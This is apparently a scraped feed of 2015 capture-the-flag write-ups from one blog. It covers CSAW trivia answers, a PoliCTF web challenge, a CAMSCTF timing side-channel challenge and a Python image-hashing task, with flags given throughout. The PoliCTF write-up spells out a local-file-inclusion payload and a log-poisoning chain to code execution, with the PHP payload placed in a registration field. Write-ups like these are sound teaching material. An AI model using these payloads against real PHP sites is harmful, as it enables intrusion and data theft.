<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO3E6ta5iTpS-VMaNIjRm6IbxrfnIbbmwRPi0SfwjuvymlIqTzlR9hDxeu8DAcRDawcqp0SG78B7Gyr3g6RUQDHrqJwDOMncWfdyp594MX-ULIWRCIiJ9QJDR3B_8mg_5PiCJWg-FHk7E_/s1600/m100_fix2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO3E6ta5iTpS-VMaNIjRm6IbxrfnIbbmwRPi0SfwjuvymlIqTzlR9hDxeu8DAcRDawcqp0SG78B7Gyr3g6RUQDHrqJwDOMncWfdyp594MX-ULIWRCIiJ9QJDR3B_8mg_5PiCJWg-FHk7E_/s400/m100_fix2.png" width="400" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">s</span></b><span style="color: red;"><b>1z3_d03s_ma773r_baby</b></span>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-613441359750698412015-09-21T09:12:00.000+07:002015-09-21T09:12:12.748+07:00CSAW CTF 2015: Trivia 1-6 (Trivia) Write-up<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmq2aCEuK5qvjc7RNsaf-FJ7MO2bCjwXk5JoTngbi2Hp2olmct8vmhbBiOqIycQzGPxoWTffk6TC08i6QLl1F5FM4N7QnqysuPDVLij610JBfAbtvnAuerEkkl-pI9qgOQPMA3qeDyMnR/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmq2aCEuK5qvjc7RNsaf-FJ7MO2bCjwXk5JoTngbi2Hp2olmct8vmhbBiOqIycQzGPxoWTffk6TC08i6QLl1F5FM4N7QnqysuPDVLij610JBfAbtvnAuerEkkl-pI9qgOQPMA3qeDyMnR/s400/Capture.PNG" width="400" /></a></div>
<b><br /></b>
<b><br /></b>
<b>Challenge:</b> Trivia 1<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This family of malware has gained notoriety after anti-virus and threat intelligence companies claimed that it was being used by <u>several Chinese military groups.</u></blockquote>
<b>Solution: </b><a href="http://www.esecurityplanet.com/malware/report-plugx-is-rat-of-choice-for-nation-states.html">http://www.esecurityplanet.com/malware/report-plugx-is-rat-of-choice-for-nation-states.html</a><br />
<b>Flag: </b><span style="color: red;"><b>PlugX</b></span><br />
<b><br /></b>
<b>Challenge:</b> Trivia 2<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
No More Free __!</blockquote>
<b>Solution: </b><a href="http://www.zdnet.com/article/no-more-free-bugs-there-never-were-any-free-bugs/">http://www.zdnet.com/article/no-more-free-bugs-there-never-were-any-free-bugs/</a><br />
<b>Flag: </b><span style="color: red;"><b>Bugs</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge:</b> Trivia 3<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This mode on x86 is generally referred to as <u>ring -2</u>.</blockquote>
<b>Solution: </b><a href="https://en.wikipedia.org/wiki/System_Management_Mode">https://en.wikipedia.org/wiki/System_Management_Mode</a><br />
<b>Flag: </b><span style="color: red;"><b>SMM</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge:</b> Trivia 4<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This vulnerability occurs when the <u>incorrect timing/sequence of events</u> may cause a bug.</blockquote>
<b>Solution: </b><a href="https://en.wikipedia.org/wiki/Race_condition">https://en.wikipedia.org/wiki/Race_condition</a><br />
<b>Flag: </b><span style="color: red;"><b>Race condition</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge:</b> Trivia 5<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
On Windows, loading a library and having it's code run in <u>another process</u> is called _ .</blockquote>
<b>Solution: </b><a href="https://en.wikipedia.org/wiki/DLL_injection">https://en.wikipedia.org/wiki/DLL_injection</a><br />
<b>Flag: </b><span style="color: red;"><b>DLL injection</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge: </b>Math aside, we're all black hats Now<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This Pentesting expert supplied <u>HBO's Silicon Valley with technical advice</u> in season 2. The flag is his twitter handle.</blockquote>
<b>Solution: </b><a href="https://www.linkedin.com/in/mubix">https://www.linkedin.com/in/mubix</a><br />
<b>Flag: </b><span style="color: red;"><b>mubix</b></span>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-58519055364327268942015-07-12T16:40:00.002+07:002015-08-28T22:21:14.148+07:00PoliCTF 2015: Magic Chall (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
I visit this website when I'm sad, contains many magical things that help me to find the solution. Focused on
your problem and find "the magic thing" that will help you to solve it.
</blockquote>
<b>Solution:</b><br />
<br />
1. Go to <a href="http://magic.polictf.it/index.php?page=register">http://magic.polictf.it/index.php?page=register</a>, and I try <a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">Local File Inclusion</a> in "<b>page</b>" parameter with <a href="https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/">base64 encode php filter</a>.<br />
Ex.<span class="Apple-tab-span" style="white-space: pre;"> </span><a href="http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index">http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index</a>, and read all php file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdhaUHURM0r-RDEOa2oKu1ETNMac0U-6Ie0rofIqY2L3RyP_nfLUaaXA8yNfJqn6-nlG-frH7J5gK_KUWfwrhZuQvzUrnzJF020NfAi90qFuhZk_x9b9w-QV3VLlr5Z-8g64F0tK-xshzK/s1600/magic1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdhaUHURM0r-RDEOa2oKu1ETNMac0U-6Ie0rofIqY2L3RyP_nfLUaaXA8yNfJqn6-nlG-frH7J5gK_KUWfwrhZuQvzUrnzJF020NfAi90qFuhZk_x9b9w-QV3VLlr5Z-8g64F0tK-xshzK/s400/magic1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSp5k93BDeLugm7jwIX1LqHqSdiILfsR4XSNFl0Y86IxWeR5imGR2pEKytJBR9577Nc7OwqaykWsWNcbtiBOryGHsHimX3dPB9VdNdk1ZvwHUZ3bB6abIT8hf9dHAJVEIHBetGkPkGExJk/s1600/magic2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSp5k93BDeLugm7jwIX1LqHqSdiILfsR4XSNFl0Y86IxWeR5imGR2pEKytJBR9577Nc7OwqaykWsWNcbtiBOryGHsHimX3dPB9VdNdk1ZvwHUZ3bB6abIT8hf9dHAJVEIHBetGkPkGExJk/s400/magic2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
2. /index.php file. <span class="Apple-tab-span" style="white-space: pre;"> </span><br />
<pre class="brush:[php];tab-size: 4; first-line: 14; highlight: [16,19,20];">if(isset($_POST["login"])){
if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){
$user = new User($_POST["username"], $_POST["password"]);
$login = $user -> login();
if($login){
$logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user);
$logger -> log_access();
header("Location: magic_things.php");
}
}
}
</pre>
<a href="http://php.net/manual/en/function.gethostbyaddr.php">gethostbyaddr</a> function *0*, I go to <a href="http://ipinfo.io/">http://ipinfo.io/</a> and get my hostname. :)<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
3. /classes/logger/logger.php, in <b>__construct </b>I see...<br />
<pre class="brush:[php];tab-size: 4; first-line: 6; highlight: [8];"> public function __construct($host, $user){
$this -> host = $host;
$this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname();
$this -> user = $user;
date_default_timezone_set("UTC");
} </pre>
<b>log_access()</b> function and <b>initLogFile()</b> function have <a href="http://php.net/manual/en/function.fwrite.php">fwrite</a> to write log file. It mean in /log folder have a log file name will concat my hostname and underscore and surname (in register)<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
Ex.<span class="Apple-tab-span" style="white-space: pre;"> </span><a href="http:/#">http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname</a><br />
<br />
I can write file :D<br />
<br />
4. back to index.php<br />
<pre class="brush:[php];tab-size: 4; first-line: 57; highlight: [59];"> <div id="content">
<?php
include($page.".php");
?>
</div></pre>
<a href="http://php.net/manual/en/function.include.php">include</a> function can be execute php code!!<br />
in "surname" field I set to name.php.<br />
<br />
5. In "name" and "surname" field I can set to php code. Ex. <b><?php phpinfo(); ?></b>, and I select to set php code in "name" field.<br />
<pre class="brush:[php]; tab-size: 4; first-line: 13; highlight: [18,20,30,32];"> public function log_access(){
$active = $this -> user -> isActive();
if(!$active){
$this -> initLogFile();
}
$fo = fopen($this -> filename, 'a');
if($fo){
$write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n");
fclose($fo);
if($write)
return true;
else
return false;
}
}
public function initLogFile(){
$fo = fopen($this -> filename, 'w+');
if($fo){
$write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n");//write header in logfile.
fclose($fo);
if($write){
$this -> user -> setActiveBit(1);
return true;
}
else
return false;
}
}</pre>
6. In /classes/magic/magic.php, I just LFI to Remote code execution to call <b><span style="color: red;">__call</span> </b>function.<br />
<pre class="brush:[php]; tab-size: 4; first-line: 14; highlight: [14,,16,19,21];"> public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) {
$mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall");
$stmt = $mysqli->prepare("SELECT word FROM magic_word");
$stmt -> execute();
$stmt -> store_result();
$stmt -> bind_result($magic_word);
$stmt -> fetch();
echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word;
session_destroy();
}
</pre>
<br />
<b>Exploitation:</b><br />
<b><br /></b>
Step 1: Register - <a href="http://magic.polictf.it/index.php?page=register">http://magic.polictf.it/index.php?page=register</a><br />
<br />
Name: <b><?php $magic = new Magic(); $magic->__call(); ?></b><br />
Surname: <b>icheernoom.php</b><br />
User: icheernoom<br />
Password: icheernoom<br />
<br />
Step 2: Login - <a href="http://magic.polictf.it/index.php?page=login">http://magic.polictf.it/index.php?page=login</a><br />
<br />
User: icheernoom<br />
Password: icheernoom<br />
<br />
Step 3: Access to <a href="http:/#">http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom</a><br />
<br />
Get a flag!<br />
<pre class="brush:[html]; first-line: 13; tab-size: 4;"> <div id="content">
name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM
Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success
</div></pre>
<b>My Automate Script:</b><br />
<b><br /></b>
<script src="https://gist.github.com/icheernoom/72b982f393de89e52efb.js"></script><b><br /></b><b>Explorer:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGf2RGGUEGIu8wGTbsYxsnCMPb0VS_5EAfzoVFbgIyW1ulqCBa6J_HZEwuBZjFkRBpWyVzhowGwat1w5XOL_7nLaNqVpXzFwmQke8tZGjP4Tq4SEn5yaHHu3ScwnQOqig7u-N4xqec0U7/s1600/magic4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGf2RGGUEGIu8wGTbsYxsnCMPb0VS_5EAfzoVFbgIyW1ulqCBa6J_HZEwuBZjFkRBpWyVzhowGwat1w5XOL_7nLaNqVpXzFwmQke8tZGjP4Tq4SEn5yaHHu3ScwnQOqig7u-N4xqec0U7/s1600/magic4.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJMM7f4brJoJt5kPu-YCZlCt7D2EMKGZ3DvxqAFlJP49VdHsIC95FGO8jnCq8alROzUyDcGuAM9aZyMiK-r3t2zJM-JO6IKmDGJvbDn2-bHfEkC579ZOLcdJlWy8qcV-Yhe9nJenkDv3Fp/s1600/magic5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJMM7f4brJoJt5kPu-YCZlCt7D2EMKGZ3DvxqAFlJP49VdHsIC95FGO8jnCq8alROzUyDcGuAM9aZyMiK-r3t2zJM-JO6IKmDGJvbDn2-bHfEkC579ZOLcdJlWy8qcV-Yhe9nJenkDv3Fp/s1600/magic5.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
and more...</div>
<br />
<b>Flag:</b> <span style="color: red;"><b>flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}</b></span>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-59699417599897015352015-04-25T12:12:00.002+07:002015-08-28T22:21:20.677+07:00CAMSCTF CCTF 2015: Web B (Exploitation) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
"Time is what we want most, but what we use worst." - William Penn</blockquote>
<b>Solution:</b><br />
<b><br /></b>
Target: <a href="http://web.camsctf.com/b/">http://web.camsctf.com/b/</a><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJNfbXpD4MloadMakA1jjnFAUwRc4QVB4QNlPxImLqdXbpu2xlCfGLBvNd_kPEfXzyD9uJhHvVUoUJnW9A8PcPSuyRilM9kpPuJSoB4yE8cRAsmQLp1HRbGVv-ZR3ak3bM9h88xCXebUg/s1600/webB1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJNfbXpD4MloadMakA1jjnFAUwRc4QVB4QNlPxImLqdXbpu2xlCfGLBvNd_kPEfXzyD9uJhHvVUoUJnW9A8PcPSuyRilM9kpPuJSoB4yE8cRAsmQLp1HRbGVv-ZR3ak3bM9h88xCXebUg/s1600/webB1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Intercept http request with Burp Suite.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoYcCNy0_7KJDkPVquZps6LdXB3ziaEt0Weyhbz23UruQU93Js_idd-izRO7rOFviCnUaBV2DBbrJK8kmInParMuUelDYp8LFgyEpqYrUV7KEoIcmBLCzjnyU21MUmFKWoLSKLay4WVaVY/s1600/webB2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoYcCNy0_7KJDkPVquZps6LdXB3ziaEt0Weyhbz23UruQU93Js_idd-izRO7rOFviCnUaBV2DBbrJK8kmInParMuUelDYp8LFgyEpqYrUV7KEoIcmBLCzjnyU21MUmFKWoLSKLay4WVaVY/s1600/webB2.png" height="144" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
debug=0 ?, try to change debug to 1</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixptCV8LvuVhumThPstv4dsn9dmoo9IZv3FzrOQg6WQhR8Deg9KVn3-mQyo18q5ueLbIcOQ1aB3mzz2rMqZGkm_qkpxyu3nEPf-2fnuR112r1uQCzRewLmxmiw6AajSoAhMSm5B8Ils3VB/s1600/webB3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixptCV8LvuVhumThPstv4dsn9dmoo9IZv3FzrOQg6WQhR8Deg9KVn3-mQyo18q5ueLbIcOQ1aB3mzz2rMqZGkm_qkpxyu3nEPf-2fnuR112r1uQCzRewLmxmiw6AajSoAhMSm5B8Ils3VB/s1600/webB3.png" height="111" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Base64 decode and get a start time and end time.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguT10O5MKiNF4IL1h5iOP0nZFQl4iHXqmZkzfOQseAFMNYhlx3zukQxc8dkz-l7HQE4ZT4BYyFpp2P0mXYNTE6RmmBJjPSIUTFgiOIGrq0Zd-C_U5BowFHeQpO_Ndl-Qt-6TWlRFx1KL6a/s1600/webB4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguT10O5MKiNF4IL1h5iOP0nZFQl4iHXqmZkzfOQseAFMNYhlx3zukQxc8dkz-l7HQE4ZT4BYyFpp2P0mXYNTE6RmmBJjPSIUTFgiOIGrq0Zd-C_U5BowFHeQpO_Ndl-Qt-6TWlRFx1KL6a/s1600/webB4.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
"Time", then I see this word, I think It must about <a href="https://www.owasp.org/images/c/cd/Side_Channel_Vulnerabilities.pdf">Side-channel attack</a>, and my solution below.<br />
<br />
<script src="https://gist.github.com/icheernoom/0ffafcc13478f1e990bc.js"></script>
password=<b>uHH>nN#)[Ks5v:E</b>&debug=1 to get the flag. :D<br />
<br />
<b>Flag:</b> <b><span style="color: red;">{how_many_microseconds_did_i_waste_solving_this_0ne}</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-66878659973336500532015-04-25T12:12:00.001+07:002015-08-28T22:21:05.373+07:00CAMSCTF CCTF 2015: Python 2 (Programming) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
1.) Take the RGB value of every pixel in one image.(Start at (0,0). Move down to (0,299). Go to (1,0). Move to (1,299). And so on. Read the files in numerical order.)<br />
2.) Add all of the R values, G values, and B values in each image. (Have one R sum, one B sum, one G sum for every image.)<br />
3.) Take these sums and convert them into strings. Take the MD5 hash of each string.<br />
4.) Concatenate these MD5 hashes into one string.<br />
5.) Take the MD5 hash of the new string.<br />
6.) Do this for every image and concatenate the final MD5 hashes into one string. (Image 1 final hash + Image 2 final hash + ...)<br />
7.) Take the MD5 of this string to get the flag.<br />
<u><a href="http://cdn.camsctf.com/?f=PIL.zip">PIL.zip</a></u></blockquote>
<br />
<b>Solution: </b><br />
<br />
<script src="https://gist.github.com/icheernoom/d977833d647491cf6f93.js"></script>
<b>Flag:</b> <b><span style="color: red;">2d98c27f040ce429b35dd84124397f65</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0